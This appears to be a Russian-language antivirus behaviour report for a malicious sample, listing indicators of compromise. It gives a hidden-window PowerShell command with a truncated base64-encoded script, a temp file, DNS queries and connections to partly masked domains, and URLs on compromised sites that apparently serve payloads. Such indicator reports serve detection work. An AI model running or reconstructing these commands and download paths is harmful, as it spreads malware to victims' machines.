Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGEAaQB0AGsAdQB0AGgAZQBlAGYAPQAnAGgAdQBhAGwAdABhAHMAdABoAGkAYQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBpAGAAVAB5AGAAcABgAFIAbwB0AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1580
- %TEMP%\1369751.cvr
- 'xe#a.cz':80
- 'si##q.com':80
- 'wi##e.be':80
- 'wi##e.be':443
- 'au######crefreshments.com':80
- http://xe#a.cz/MqjiWrT/
- http://wi##e.be/awstats/lseZLdJ/
- http://au######crefreshments.com/wp-includes/bVhbrGmu/
- 'wi##e.be':443
- DNS ASK xe#a.cz
- DNS ASK ze###oser.com
- DNS ASK si##q.com
- DNS ASK wi##e.be
- DNS ASK au######crefreshments.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGEAaQB0AGsAdQB0AGgAZQBlAGYAPQAnAGgAdQBhAGwAdABhAHMAdABoAGkAYQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBpAGAAVAB5AGAAcABgAFIAbwB0AG...' (со скрытым окном)